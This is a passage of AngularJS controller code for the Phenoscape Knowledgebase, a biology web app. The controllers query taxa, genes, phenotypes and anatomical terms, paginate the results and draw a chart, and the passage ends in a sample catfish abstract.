$scope.phenotypeGenesMaxSize = 3; $scope.phenotypeGenesLimit = 20; $scope.phenotypeGenesSettings = {}; $scope.phenotypeGenesSettings.includeParts = false; $scope.phenotypeGenesSettings.includeHomologs = false; $scope.phenotypeGenesPageChanged = function (newPage) { $scope.phenotypeGenesPage = newPage; $scope.phenotypeGenes = EntityPhenotypeGenes.query( { iri: $scope.termID, limit: $scope.phenotypeGenesLimit, offset: ($scope.phenotypeGenesPage - 1) * $scope.phenotypeGenesLimit, parts: $scope.phenotypeGenesSettings.includeParts, homologs: $scope.phenotypeGenesSettings.includeHomologs }); }; $scope.resetPhenotypeGenes = function() { $scope.phenotypeGenesTotal = EntityPhenotypeGenes.query( { iri: $scope.termID, total: true, parts: $scope.phenotypeGenesSettings.includeParts, homologs: $scope.phenotypeGenesSettings.includeHomologs }); $scope.phenotypeGenesPageChanged(1); }; $scope.expressionGenesPage = 1; $scope.expressionGenesMaxSize = 3; $scope.expressionGenesLimit = 20; $scope.expressionGenesPageChanged = function (newPage) { $scope.expressionGenesPage = newPage; $scope.expressionGenes = EntityExpressionGenes.query({iri: $scope.termID, limit: $scope.expressionGenesLimit, offset: ($scope.expressionGenesPage - 1) * $scope.expressionGenesLimit}); }; $scope.resetExpressionGenes = function() { $scope.expressionGenesTotal = EntityExpressionGenes.query({iri: $scope.termID, total: true}); $scope.expressionGenesPageChanged(1); }; $scope.resetTaxaWithPresence(); $scope.resetTaxaWithAbsence(); $scope.resetPhenotypeGenes(); $scope.resetExpressionGenes(); }) .controller('TaxonController', function ($scope, $routeParams, $location, $log, $window, Taxon, TaxonPhenotypesQuery, VariationProfileQuery, EntityPresenceEvidence, EntityAbsenceEvidence, OntologyTermSearch, OMN, Vocab, Label, APIroot) { $scope.taxonID = $routeParams.taxon; $scope.taxon = Taxon.query({'iri': $scope.taxonID}); $scope.filters = { phenotypesEntityFilter: null, phenotypesQualityFilter: null, quality_type: null, phenotypesEntityIncludeParts: false, phenotypesEntityIncludeHomologs: false }; if ($routeParams['phenotypes.entity']) { Label.query({'iri': $routeParams['phenotypes.entity']}).$promise.then(function (response) { $scope.filters.phenotypesEntityFilter = response; }); } if ($routeParams['phenotypes.quality_type']) { $scope.filters.quality_type = $routeParams['phenotypes.quality_type'] } else { $scope.filters.quality_type = "quality-phenotype"; } if ($routeParams['phenotypes.quality']) { Label.query({'iri': $routeParams['phenotypes.quality']}).$promise.then(function (response) { $scope.filters.phenotypesQualityFilter = response; }); } if ($routeParams['phenotypes.entity_parts']) { $scope.filters.phenotypesEntityIncludeParts = "true" === $routeParams['phenotypes.entity_parts']; } if ($routeParams['phenotypes.entity_homologs']) { $scope.filters.phenotypesEntityIncludeHomologs = "true" === $routeParams['phenotypes.entity_homologs']; } $scope.autocompleteEntity = function (text) { return OntologyTermSearch.query({ limit: 20, text: text, definedBy: Vocab.Uberon }).$promise.then(function (response) { return response.results; }); }; $scope.autocompleteQuality = function (text) { return OntologyTermSearch.query({ limit: 20, text: text, definedBy: Vocab.PATO }).$promise.then(function (response) { return response.results; }); }; $scope.phenotypeProfilePage = 1; $scope.phenotypeProfileLimit = 20; $scope.phenotypeProfileMaxSize = 3; $scope.phenotypeProfilePageChanged = function (newPage) { $scope.phenotypeProfilePage = newPage; var params = { 
taxon: $scope.taxonID, parts: $scope.filters.phenotypesEntityIncludeParts, homologs: $scope.filters.phenotypesEntityIncludeHomologs, limit: $scope.phenotypeProfileLimit, offset: ($scope.phenotypeProfilePage - 1) * $scope.phenotypeProfileLimit }; if ($scope.filters.quality_type == 'quality-phenotype') { if ($scope.filters.phenotypesEntityFilter) { params.entity = OMN.angled($scope.filters.phenotypesEntityFilter['@id']); } if ($scope.filters.phenotypesQualityFilter) { params.quality = OMN.angled($scope.filters.phenotypesQualityFilter['@id']); } $scope.phenotypeProfile = TaxonPhenotypesQuery.query(params); } else { var service = null; if ($scope.filters.quality_type == 'entailing-presence') { service = EntityPresenceEvidence; } else { service = EntityAbsenceEvidence; } if ($scope.filters.phenotypesEntityFilter) { params.entity = $scope.filters.phenotypesEntityFilter['@id']; $scope.phenotypeProfile = service.query(params); } else { $scope.phenotypeProfile = null; } } }; $scope.resetPhenotypeProfile = function () { var params = { taxon: $scope.taxonID, parts: $scope.filters.phenotypesEntityIncludeParts, homologs: $scope.filters.phenotypesEntityIncludeHomologs, total: true}; if ($scope.filters.quality_type == 'quality-phenotype') { if ($scope.filters.phenotypesEntityFilter) { params.entity = OMN.angled($scope.filters.phenotypesEntityFilter['@id']); } if ($scope.filters.phenotypesQualityFilter) { params.quality = OMN.angled($scope.filters.phenotypesQualityFilter['@id']); } $scope.phenotypeProfileTotal = TaxonPhenotypesQuery.query(params); var url = APIroot + "/taxon/phenotypes?"; var urlParams = ["limit=0"]; urlParams.push("parts=" + params.parts); if (params.entity) { urlParams.push("entity=" + $window.encodeURIComponent(params.entity)); } if (params.quality) { urlParams.push("quality=" + $window.encodeURIComponent(params.quality)); } urlParams.push("taxon=" + $window.encodeURIComponent(params.taxon)); $scope.linkToTaxonPhenotypeProfileDownload = url + urlParams.join("&"); } else { var service = null; var url = null; if ($scope.filters.quality_type == 'entailing-presence') { service = EntityPresenceEvidence; url = APIroot + "/entity/presence/evidence?"; } else { service = EntityAbsenceEvidence; url = APIroot + "/entity/absence/evidence?"; } if ($scope.filters.phenotypesEntityFilter) { params.entity = $scope.filters.phenotypesEntityFilter['@id']; $scope.phenotypeProfileTotal = service.query(params); var urlParams = ["limit=0"]; urlParams.push("taxon=" + $window.encodeURIComponent(params.taxon)); urlParams.push("entity=" + $window.encodeURIComponent(params.entity)); $scope.linkToTaxonPhenotypeProfileDownload = url + urlParams.join("&"); } else { $scope.phenotypeProfileTotal = null; $scope.linkToTaxonPhenotypeProfileDownload = null; } } $scope.phenotypeProfilePageChanged(1); } $scope.resetPhenotypeProfile(); $scope.$watchGroup(['filters.phenotypesEntityFilter', 'filters.phenotypesQualityFilter', 'filters.quality_type', 'filters.phenotypesEntityIncludeParts', 'filters.phenotypesEntityIncludeHomologs'], function (value) { $scope.resetPhenotypeProfile(); }); $scope.$watch('filters.phenotypesEntityFilter', function (value) { if ($scope.filters.phenotypesEntityFilter) { $location.search('phenotypes.entity', $scope.filters.phenotypesEntityFilter['@id']); } else { $location.search('phenotypes.entity', null); } }); $scope.$watch('filters.phenotypesQualityFilter', function (value) { if ($scope.filters.phenotypesQualityFilter) { $location.search('phenotypes.quality', 
$scope.filters.phenotypesQualityFilter['@id']); } else { $location.search('phenotypes.quality', null); } }); $scope.$watch('filters.quality_type', function (value) { $location.search('phenotypes.quality_type', $scope.filters.quality_type); }); $scope.$watch('filters.phenotypesEntityIncludeParts', function (value) { $location.search('phenotypes.entity_parts', $scope.filters.phenotypesEntityIncludeParts ? "true" : "false"); }); $scope.$watch('filters.phenotypesEntityIncludeHomologs', function (value) { $location.search('phenotypes.entity_homologs', $scope.filters.phenotypesEntityIncludeHomologs ? "true" : "false"); }); $scope.variationProfilePage = 1; $scope.variationProfileLimit = 20; $scope.variationProfileMaxSize = 3; $scope.variationProfileTotal = VariationProfileQuery.query({taxon: $scope.taxonID, total: true}); $scope.variationProfilePageChanged = function (newPage) { $scope.variationProfilePage = newPage; $scope.variationProfile = VariationProfileQuery.query({taxon: $scope.taxonID, limit: $scope.variationProfileLimit, offset: ($scope.variationProfilePage - 1) * $scope.variationProfileLimit}); }; $scope.variationProfilePageChanged(1); $scope.tabs = { properties: {active: true}, phenotypes: {active: false}, variation: {active: false}, similarity: {active: false} } $scope.activateTab = function (tabname) { if (_.has($scope.tabs, tabname)) { $scope.tabs[tabname].active = true; $location.search('tab', tabname); } } $scope.$on('$routeUpdate', function() { $scope.activateTab($location.search().tab); }); if ($routeParams.tab && _.has($scope.tabs, $routeParams.tab)) { $scope.tabs[$routeParams.tab].active = true; } }) .controller('StudyController', function ($scope, $routeParams, $location, $log, $window, Study, StudyTaxa, StudyPhenotypes, Vocab, Label) { $scope.studyID = $routeParams.study; $scope.study = Study.query({'iri': $scope.studyID}); $scope.phenotypesPage = 1; $scope.phenotypesLimit = 20; $scope.phenotypesMaxSize = 3; $scope.phenotypesPageChanged = function (newPage) { $scope.phenotypesPage = newPage; var params = { iri: $scope.studyID, limit: $scope.phenotypesLimit, offset: ($scope.phenotypesPage - 1) * $scope.phenotypesLimit }; $scope.phenotypes = StudyPhenotypes.query(params); }; $scope.resetPhenotypes = function () { var params = {iri: $scope.studyID, total: true}; $scope.phenotypesTotal = StudyPhenotypes.query(params); $scope.phenotypesPageChanged(1); } $scope.resetPhenotypes(); $scope.taxaPage = 1; $scope.taxaLimit = 20; $scope.taxaMaxSize = 3; $scope.taxaPageChanged = function (newPage) { $scope.taxaPage = newPage; var params = { iri: $scope.studyID, limit: $scope.taxaLimit, offset: ($scope.taxaPage - 1) * $scope.taxaLimit }; $scope.taxa = StudyTaxa.query(params); }; $scope.resetTaxa = function () { var params = {iri: $scope.studyID, total: true}; $scope.taxaTotal = StudyTaxa.query(params); $scope.taxaPageChanged(1); } $scope.resetTaxa(); }) .controller('GeneController', function ($scope, $routeParams, $location, Gene, GenePhenotypes, GeneExpression) { $scope.geneID = $routeParams.gene; $scope.gene = Gene.query({iri: $scope.geneID}); $scope.queryPhenotypes = function () { $scope.phenotypes = GenePhenotypes.query({iri: $scope.geneID}); } $scope.queryExpression = function () { $scope.expression = GeneExpression.query({iri: $scope.geneID}); } $scope.queryPhenotypes(); $scope.queryExpression(); $scope.tabs = { phenotypes: {active: true}, expression: {active: false}, similarity: {active: false} } $scope.activateTab = function (tabname) { if (_.has($scope.tabs, tabname)) { 
$scope.tabs[tabname].active = true; $location.search('tab', tabname); } } $scope.$on('$routeUpdate', function() { $scope.activateTab($location.search().tab); }); if ($routeParams.tab && _.has($scope.tabs, $routeParams.tab)) { $scope.tabs[$routeParams.tab].active = true; } }) .controller('CharacterStateController', function ($scope, $routeParams, Label) { $scope.stateID = $routeParams.state; $scope.termLabel = Label.query({'iri': $scope.stateID}); }) .controller('ContentsController', function ($scope) { }) .controller('PresenceAbsenceController', function ($scope, EntityPresence) { $scope.presenceStates = []; $scope.queryPresence = function () { if ($scope.taxon && $scope.entity) { $scope.presenceStates = EntityPresence.query({'taxon': $scope.taxon, 'entity': $scope.entity}); } else { $scope.presenceStates = []; } }; }) .controller('QueryCharacterStatesController', function ($scope, CharacterStateQuery, Vocab, OMN) { $scope.queryPanelOptions = { includeTaxonGroup: true, includeEntity: true }; $scope.queryParams = { taxa: [], entities: [], expressionEntities: [], matchAllEntities: false, }; $scope.maxSize = 5; $scope.itemsPage = 1; $scope.itemsLimit = 20; $scope.pageChanged = function () { $scope.queryCharacterStates(); } function webServiceParams(queryParams) { var result = {}; var taxa = queryParams.taxa.map(function (item) { return OMN.angled(item['@id']); }); if (taxa.length > 0) { if (queryParams.matchAllTaxa) { result.taxon = OMN.intersection(taxa); } else { result.taxon = OMN.union(taxa); } } var entities = queryParams.entities.map(function (item) { return OMN.angled(item['@id']); }); if (entities.length > 0) { if (queryParams.matchAllEntities) { result.entity = OMN.intersection(entities); } else { result.entity = OMN.union(entities); } } return result; } $scope.queryCharacterStates = function () { $scope.statesResults = CharacterStateQuery.query(_.extend({ limit: $scope.itemsLimit, offset: ($scope.itemsPage - 1) * $scope.itemsLimit }, webServiceParams($scope.queryParams))); }; $scope.queryTotal = function () { $scope.itemsTotal = CharacterStateQuery.query(_.extend({total: true}, webServiceParams($scope.queryParams))); }; $scope.applyQueryFilter = function() { $scope.itemsPage = 1; $scope.queryCharacterStates(); $scope.queryTotal(); } $scope.queryCharacterStates(); $scope.queryTotal(); }) .controller('QueryVariationProfileController', function ($scope, $routeParams, VariationProfileQuery, Vocab, OMN, Label) { $scope.queryPanelOptions = { includeTaxonGroup: true, includeEntity: false }; // $scope.queryParams = { // taxa: [], // entities: [], // expressionEntities: [], // matchAllEntities: false, // }; $scope.maxSize = 5; $scope.itemsPage = 1; $scope.itemsLimit = 20; $scope.pageChanged = function () { $scope.queryVariationProfile(); } function webServiceParams(queryParams) { var result = {}; var taxa = queryParams.taxa.map(function (item) { return item['@id']; }); if (taxa.length > 0) { result.taxon = angular.toJson(taxa); } var entities = queryParams.entities.map(function (item) { return OMN.angled(item['@id']); }); if (entities.length > 0) { if (queryParams.matchAllEntities) { result.entity = OMN.intersection(entities); } else { result.entity = OMN.union(entities); } } return result; } $scope.queryVariationProfile = function () { $scope.profileResults = VariationProfileQuery.query(_.extend({ limit: $scope.itemsLimit, offset: ($scope.itemsPage - 1) * $scope.itemsLimit }, webServiceParams($scope.queryParams))); }; $scope.queryTotal = function () { $scope.itemsTotal = 
VariationProfileQuery.query(_.extend({total: true}, webServiceParams($scope.queryParams))); }; $scope.applyQueryFilter = function() { $scope.itemsPage = 1; $scope.queryVariationProfile(); $scope.queryTotal(); } var urlQueryParams = { taxa: [], entities: [], matchAllEntities: false, }; var taxa = []; if ($routeParams.taxa) { var taxa = angular.fromJson($routeParams.taxa); } urlQueryParams.taxa = taxa.map(function (item) { return {'@id': item}; }); $scope.queryParams = urlQueryParams; $scope.queryVariationProfile(); $scope.queryTotal(); // if (angular.isDefined(taxa)) { // urlQueryParams.taxa = taxa.map(function (item) { // return Label.query({iri: item}); // }); // } // $q.all(urlQueryParams.taxa.map(function (item) { // return item.$promise; // })).then(function (data) { // $scope.queryParams = urlQueryParams; // $scope.queryVariationProfile(); // $scope.queryTotal(); // }); }) .controller('QueryTaxaController', function ($scope, TaxonQuery, Vocab, OMN) { $scope.queryPanelOptions = { includeTaxonGroup: true, includeEntity: true, includeExpressionEntity: false }; $scope.queryParams = { taxa: [], entities: [], expressionEntities: [], matchAllEntities: false, }; $scope.maxSize = 5; $scope.itemsPage = 1; $scope.itemsLimit = 20; $scope.pageChanged = function () { $scope.queryTaxa(); } function webServiceParams(queryParams) { var result = {}; var taxa = queryParams.taxa.map(function (item) { return OMN.angled(item['@id']); }); if (taxa.length > 0) { if (queryParams.matchAllTaxa) { result.taxon = OMN.intersection(taxa); } else { result.taxon = OMN.union(taxa); } } var entities = queryParams.entities.map(function (item) { return OMN.angled(item['@id']); }); if (entities.length > 0) { if (queryParams.matchAllEntities) { result.entity = OMN.intersection(entities); } else { result.entity = OMN.union(entities); } } return result; } $scope.queryTaxa = function () { $scope.taxaResults = TaxonQuery.query(_.extend({ limit: $scope.itemsLimit, offset: ($scope.itemsPage - 1) * $scope.itemsLimit }, webServiceParams($scope.queryParams))); }; $scope.queryTotal = function () { $scope.itemsTotal = TaxonQuery.query(_.extend({total: true}, webServiceParams($scope.queryParams))); }; $scope.applyQueryFilter = function() { $scope.itemsPage = 1; $scope.queryTaxa(); $scope.queryTotal(); } $scope.queryTaxa(); $scope.queryTotal(); }) .controller('QueryGenesController', function ($scope, GeneQuery, Vocab, OMN) { $scope.queryPanelOptions = { includeTaxonGroup: false, includeEntity: true, includeExpressionEntity: false //not yet working on service side }; $scope.queryParams = { taxa: [], entities: [], expressionEntities: [], matchAllEntities: false, }; $scope.maxSize = 5; $scope.itemsPage = 1; $scope.itemsLimit = 20; $scope.pageChanged = function () { $scope.queryGenes(); } function webServiceParams(queryParams) { var result = {}; var taxa = queryParams.taxa.map(function (item) { return OMN.angled(item['@id']); }); if (taxa.length > 0) { if (queryParams.matchAllTaxa) { result.taxon = OMN.intersection(taxa); } else { result.taxon = OMN.union(taxa); } } var entities = queryParams.entities.map(function (item) { return OMN.angled(item['@id']); }); if (entities.length > 0) { if (queryParams.matchAllEntities) { result.entity = OMN.intersection(entities); } else { result.entity = OMN.union(entities); } } var expressionEntities = queryParams.expressionEntities.map(function (item) { return OMN.angled(item['@id']); }); if (expressionEntities.length > 0) { if (queryParams.matchAllExpressionEntities) { result.expression_entity = 
OMN.intersection(expressionEntities); } else { result.expression_entity = OMN.union(expressionEntities); } } return result; } $scope.queryGenes = function () { $scope.genesResults = GeneQuery.query(_.extend({ limit: $scope.itemsLimit, offset: ($scope.itemsPage - 1) * $scope.itemsLimit }, webServiceParams($scope.queryParams))); }; $scope.queryTotal = function () { $scope.itemsTotal = GeneQuery.query(_.extend({total: true}, webServiceParams($scope.queryParams))); }; $scope.applyQueryFilter = function() { $scope.itemsPage = 1; $scope.queryGenes(); $scope.queryTotal(); } $scope.queryGenes(); $scope.queryTotal(); }) .controller('OntoTraceController', function ($scope, OntologyTermSearch, $http, Vocab, $filter, APIroot) { $scope.ontotraceURL = null; $scope.inputType = 'simple'; $scope.ontotraceSettings = { includeParts: false, includeAllCharacters: false }; $scope.queryEntityExpression = null; $scope.queryTaxonExpression = null; $scope.$watch('queryEntityLabelExpression', function (value) { if (value) { $http.get(APIroot + '/term/resolve_label_expression', {params: {expression: value}}).then( function (response) { $scope.entityExpressionErrorMessage = null; $scope.queryEntityExpression = response.data; }, function (error) { $scope.entityExpressionErrorMessage = error.data; $scope.queryEntityExpression = null; } ); } else { $scope.queryEntityExpression = null; } }); $scope.$watch('queryTaxonLabelExpression', function (value) { if (value) { $http.get(APIroot + '/term/resolve_label_expression', {params: {expression: value}}).then( function (response) { $scope.taxonExpressionErrorMessage = null; $scope.queryTaxonExpression = response.data; }, function (error) { $scope.taxonExpressionErrorMessage = error.data; $scope.queryTaxonExpression = null; } ); } else { $scope.queryTaxonExpression = null; } }); $scope.searchTaxa = function (text) { return OntologyTermSearch.query({ limit: 20, text: text, definedBy: Vocab.VTO }).$promise.then(function (response) { return response.results; }); }; $scope.searchEntities = function (text) { return OntologyTermSearch.query({ limit: 20, text: text, definedBy: Vocab.Uberon }).$promise.then(function (response) { return response.results; }); }; function prepareTerm(term) { return $filter('encodeURI')($filter('angled')(term['@id'])); } $scope.$watchGroup(['queryEntity', 'queryTaxon', 'queryEntityExpression', 'queryTaxonExpression', 'inputType', 'ontotraceSettings.includeAllCharacters', 'ontotraceSettings.includeParts'], function (value) { if ($scope.inputType == 'simple' && $scope.queryEntity && $scope.queryTaxon) { $scope.ontotraceURL = APIroot + "/ontotrace?entity=" + prepareTerm($scope.queryEntity) + "&taxon=" + prepareTerm($scope.queryTaxon) + "&variable_only=" + !$scope.ontotraceSettings.includeAllCharacters + "&parts=" + $scope.ontotraceSettings.includeParts; } else if ($scope.inputType == 'expression' && $scope.queryEntityExpression && $scope.queryTaxonExpression) { $scope.ontotraceURL = APIroot + "/ontotrace?entity=" + $filter('encodeURI')($scope.queryEntityExpression) + "&taxon=" + $filter('encodeURI')($scope.queryTaxonExpression) + "&variable_only=" + !$scope.ontotraceSettings.includeAllCharacters + "&parts=false"; } else { $scope.ontotraceURL = null; } }); }) .controller('SimilarityController', function ($scope, $routeParams, $q, $location, Gene, GeneSearch) { $scope.searchGenes = function (text) { return GeneSearch.query({ limit: 20, text: text }).$promise.then(function (response) { return response.results; }); }; $scope.$watch('geneToQuery', function (value) 
{ if (_.has(value, '@id')) { $location.search('gene', value['@id']); } }); if ($routeParams.gene) { Gene.query({iri: $routeParams.gene}).$promise.then(function (value) { $scope.geneToQuery = value; }); } }) .controller('QueryPanelController', function ($scope, $location, Autocomplete, OMN, Vocab, Label, $q) { $scope.queryPages = [ {label: "Taxa", href: "/query_taxa", key: "taxa"}, {label: "Character states", href: "/query_characters", key: "character_states"}, {label: "Genes", href: "/query_genes", key: "genes"}, {label: "Variation profile", href: "/query_variation_profile", key: "variation_profile"} ]; $scope.queryTaxonValues = []; $scope.queryEntityValues = []; $scope.queryExpressionEntityValues = []; $scope.selectedPage = _.findWhere($scope.queryPages, {key: $scope.configuration}); function maybeGetLabel(term) { if (!term.label && !term.$promise) { return Label.query({iri: term['@id']}).$promise; } else { return $q.when(term); } } function mapParameters() { _.defaults($scope.parameters, {taxa: [], entities: [], expressionEntities: []}); $q.all($scope.parameters.taxa.map(function (item) { return maybeGetLabel(item); })).then(function (items) { $scope.queryTaxonValues.splice(0, $scope.queryTaxonValues.length); items.forEach(function (item) { $scope.queryTaxonValues.push({term: item}); }); }); $q.all($scope.parameters.entities.map(function (item) { return maybeGetLabel(item); })).then(function (items) { $scope.queryEntityValues.splice(0, $scope.queryTaxonValues.length); items.forEach(function (item) { $scope.queryEntityValues.push({term: item}); }); }); $q.all($scope.parameters.expressionEntities.map(function (item) { return maybeGetLabel(item); })).then(function (items) { $scope.queryExpressionEntityValues.splice(0, $scope.queryTaxonValues.length); items.forEach(function (item) { $scope.queryExpressionEntityValues.push({term: item}); }); }); } function collectTerms(list) { var terms = list.filter(function (item) { return item.term; }).map(function (item) { return item.term; }); return terms; } $scope.queryParams = function () { var taxa = collectTerms($scope.queryTaxonValues); var entities = collectTerms($scope.queryEntityValues); var matchAllEntities; return { taxa: taxa, matchAllTaxa: false, entities: entities, matchAllEntities: $scope.parameters.matchAllEntities }; } $scope.searchTaxa = Autocomplete.taxa; $scope.searchEntities = Autocomplete.entities; $scope.applyQueryFilter = function () { $scope.queryDirty = false; $scope.applyQuery(); } var initiallyClean = true; $scope.$watch('queryParams() | json', function (value) { if (!initiallyClean) { $scope.queryDirty = true; } initiallyClean = false; $scope.parameters = _.extend($scope.parameters, $scope.queryParams()); }); $scope.$watch('selectedPage', function (value) { $location.path(value.href); }); $scope.$watch('parameters', function (value) { mapParameters(); }); $scope.queryDirty = false; mapParameters(); }) .controller('CommonGroupController', function ($scope, TaxonCommonGroup) { $scope.smallImage = function (iri) { if (iri) { var uuid = iri.replace("http://phylopic.org/image/", "").replace("/", ""); return "http://phylopic.org/assets/images/submissions/" + uuid + ".64.png"; } else { return ""; } }; $scope.group = TaxonCommonGroup.query({iri: $scope.taxon}); }) .controller('TaxonNameController', function ($scope, Taxon) { $scope.$watch('iri', function (value) { if ($scope.iri) { $scope.taxonInfo = Taxon.query({iri: $scope.iri}); } }); $scope.isGenusOrSpecies = function (taxon) { if (taxon) { if (taxon.rank) { return 
(taxon.rank['@id'] == "http://purl.obolibrary.org/obo/TAXRANK_0000005") || (taxon.rank['@id'] == "http://purl.obolibrary.org/obo/TAXRANK_0000006"); } else { return false; } } }; }) .controller('TermNameController', function ($scope, Label) { $scope.$watch('iri', function (value) { if ($scope.iri) { $scope.term = Label.query({iri: $scope.iri}); } }); }) .controller('CountedPhenotypesForTaxonController', function ($scope, TaxonPhenotypesQuery, OMN) { var params = {total: true}; params.taxon = $scope.taxon['@id']; params.entity = OMN.angled($scope.entity['@id']); params.parts = $scope.parts; params.homologs = $scope.homologs; if ($scope.quality) { params.quality = OMN.angled($scope.quality['@id']); } $scope.count = TaxonPhenotypesQuery.query(params); }) .controller('CountedPresenceOrAbsenceForTaxonController', function ($scope, EntityPresenceEvidence, EntityAbsenceEvidence, OMN) { var params = {total: true, taxon: $scope.taxon['@id'], entity: $scope.entity['@id']}; if ($scope.kind == 'presence') { $scope.count = EntityPresenceEvidence.query(params); } else { $scope.count = EntityAbsenceEvidence.query(params); } }) .controller('CharacterDescriptionAnnotationController', function ($scope, Label, PhenotypeAnnotations, CharacterDescriptionWithAnnotation) { $scope.description = CharacterDescriptionWithAnnotation.query({iri: $scope.iri}); // $scope.phenotype = Label.query({iri: $scope.iri}); $scope.eqs = PhenotypeAnnotations.query({iri: $scope.iri}); }) .controller('ClassificationController', function ($scope, $filter, Classification) { $scope.classification = Classification.query({iri: $scope.iri, definedBy: $scope.definedBy}); $scope.linkMaker = $filter($scope.linkFilter); }) .controller('SimilarityViewController', function ($scope, SimilarityMatches, SimilarityAnnotationMatches, ProfileSize, SimilarityCorpusSize) { $scope.maxSize = 3; $scope.matchesPage = 1; $scope.matchesLimit = 20; $scope.pageChanged = function () { $scope.queryTopMatches(); } $scope.matchesTotal = SimilarityCorpusSize.query({corpus_graph: $scope.corpusGraph}); //FIXME this query is too slow! 
//$scope.matchesTotal = {total: 1000}; $scope.queryTopMatches = function () { $scope.queryProfileSize = ProfileSize.query({iri: $scope.subject['@id']}); $scope.selectedMatch = null; $scope.topMatches = SimilarityMatches.query({ corpus_graph: $scope.corpusGraph, iri: $scope.subject['@id'], limit: $scope.matchesLimit, offset: ($scope.matchesPage - 1) * $scope.matchesLimit }); }; $scope.selectMatch = function (match) { $scope.selectedMatch = match; $scope.annotationMatches = null; $scope.selectedMatchProfileSize = ProfileSize.query({iri: match.match_profile['@id']}); $scope.annotationMatches = SimilarityAnnotationMatches.query({ corpus_graph: $scope.corpusGraph, query_graph: $scope.queryGraph, query_iri: $scope.subject['@id'], corpus_iri: match.match_profile['@id']} ); }; // $scope.selectedMatch = null; // $scope.annotationMatches = null; // $scope.queryProfileSize = null; // $scope.matchesPage = 1; // $scope.selectedMatchProfileSize = null; $scope.$watch("subject['@id']", function (value) { if (value) { $scope.queryTopMatches(); } }); }) .controller('VisualizationController', function ($scope, $q, TaxaWithPhenotype, OMN) { $scope.$watch('structures', function (newValue, oldValue) { queryNewData(); }); $scope.$watch('values', function (newValue, oldValue) { updateSpec(); }); $scope.structures = [ {'@id': "http://purl.obolibrary.org/obo/UBERON_0003097", label: "dorsal fin"}, {'@id': "http://purl.obolibrary.org/obo/UBERON_4000164", label: "caudal fin"}, {'@id': "http://purl.obolibrary.org/obo/UBERON_2000251", label: "adipose fin"}, {'@id': "http://purl.obolibrary.org/obo/UBERON_4000163", label: "anal fin"} ]; function queryNewData() { var allTaxonCounts = $scope.structures.map(function (item) { return { structure: item, result: TaxaWithPhenotype.query({ entity: OMN.angled(item['@id']), total: true})}; }); var allTaxonCountPromises = allTaxonCounts.map(function (item) { return item.result.$promise; }); $q.all(allTaxonCountPromises).then(function (data) { $scope.values = allTaxonCounts.map(function (item) { return { category: item.structure.label, amount: item.result.total }; }); }); } function updateSpec() { $scope.spec = { "width": 400, "height": 200, "padding": {"top": 10, "left": 50, "bottom": 20, "right": 10}, "data": [ { "name": "table", "values": $scope.values } ], "signals": [ { "name": "tooltip", "init": {}, "streams": [ {"type": "rect:mouseover", "expr": "datum"}, {"type": "rect:mouseout", "expr": "{}"} ] } ], "predicates": [ { "name": "tooltip", "type": "==", "operands": [{"signal": "tooltip._id"}, {"arg": "id"}] } ], "scales": [ { "name": "xscale", "type": "ordinal", "range": "width", "domain": {"data": "table", "field": "category"} }, { "name": "yscale", "range": "height", "nice": true, "domain": {"data": "table", "field": "amount"} } ], "axes": [ { "type": "x", "scale": "xscale" }, { "type": "y", "scale": "yscale" } ], "marks": [ { "type": "rect", "from": {"data":"table"}, "properties": { "enter": { "x": {"scale": "xscale", "field": "category"}, "width": {"scale": "xscale", "band": true, "offset": -1}, "y": {"scale": "yscale", "field": "amount"}, "y2": {"scale": "yscale", "value":0} }, "update": { "fill": {"value": "steelblue"} }, "hover": { "fill": {"value": "red"} } } }, { "type": "text", "properties": { "enter": { "align": {"value": "center"}, "fill": {"value": "#333"} }, "update": { "x": {"scale": "xscale", "signal": "tooltip.category"}, "dx": {"scale": "xscale", "band": true, "mult": 0.5}, "y": {"scale": "yscale", "signal": "tooltip.amount", "offset": -5}, "text": {"signal": 
"tooltip.amount"}, "fillOpacity": { "rule": [ { "predicate": {"name": "tooltip", "id": {"value": null}}, "value": 0 }, {"value": 1} ] } } } } ] }; } }) ;
js/controllers.js
'use strict'; /* Controllers */ angular.module('pkb.controllers', ['ui.bootstrap']) .controller('AppController', function ($scope, AnatomicalTermSearch, OntologyTermSearch, GeneSearch, Vocab) { $scope.clickLink = function () { $scope.clearSearch(); }; $scope.clearSearch = function () { $scope.searchText = null; $scope.clearResults(); }; $scope.clearResults = function () { $scope.anatomyResults = null; $scope.taxaResults = null; $scope.geneResults = null; }; $scope.performSearches = function () { if ($scope.searchText) { $scope.anatomyResults = AnatomicalTermSearch.query({text: $scope.searchText, limit: 20}); $scope.taxaResults = OntologyTermSearch.query({text: $scope.searchText, limit: 20, definedBy: Vocab.VTO}); $scope.geneResults = GeneSearch.query({text: $scope.searchText, limit: 20}); } }; }) .controller('HomeController', function ($scope, AnatomicalTermSearch, CharacterStateSearch, OntologyTermSearch, GeneSearch, Vocab) { }) .controller('AboutPhenoscapeKBController', function ($scope, AnnotationSummary) { $scope.annotationSummary = AnnotationSummary.query(); }) .controller('AboutPhenoscapeController', function ($scope) { }) .controller('AnnotateTextController', function ($scope, $sce, $http, ScigraphAnnotator) { $scope.data = { testInput: "", inputText: "The caudal skeleton of the catfishes, order Siluriformes. American Museum novitates ; no. 2398\nLundberg, John G.; Baskin, Jonathan N.\n\nTo achieve a better understanding of the evolution of catfishes, comparative studies of single character complexes throughout the entire order is believed to be a rewarding approach. A survey of the caudal skeleton of the Siluriformes reveals 10 basic features which, taken together, distinguish catfishes from other fishes. Of these the most diagnostic are: 1) bases of hypurals 3 and 4 fused with a distinct U[subscript]2 chordacentrum in the young and with a usually reduced second ural centrum in the adults; 2) a secondary hypurapophysis; 3) principal rays of the caudal fin fewer than 10+9, with upper principal rays equal to, or fewer than, the lower rays. Within the Siluriformes four features of the caudal skeleton are found to exhibit group specific patterns of variation and trends from primitive to advanced conditions, and may thus be useful in determining relationships: 1. In the trend from the primitive condition of six separate hypurals to the most advanced condition of complete fusion of caudal elements, various groups have reached different structural levels. In this process the sixth hypural is lost. 2. The trend toward elaboration of the sites of caudal muscle origin (hypurapophysis and secondary hypurapophysis) has involved the formation and elaboration of shelves from originally distinct projections, and a subsequent dorsal shift of these sites. 3. While the most primitive principal caudal fin ray number in siluriforms is 9+9, most groups have 8+9. The trend toward a reduction of principal rays always involves loss of an upper ray before loss of a lower so that upper principal rays are never more numerous than lower ones. 4. A separate U[subscript]2 chordacentrum is present in the young of all Ostariophysi except the Loricariidae, Plotosidae, and probably the Chacidae. In the adults of the majority of catfishes a reduced second ural centrum fused with one or more hypurals lies in the cavity on the posterior face of the compound centrum, PU[subscript]1+ U[subscript]l. In some groups the second ural centrum fuses to the compound centrum. 
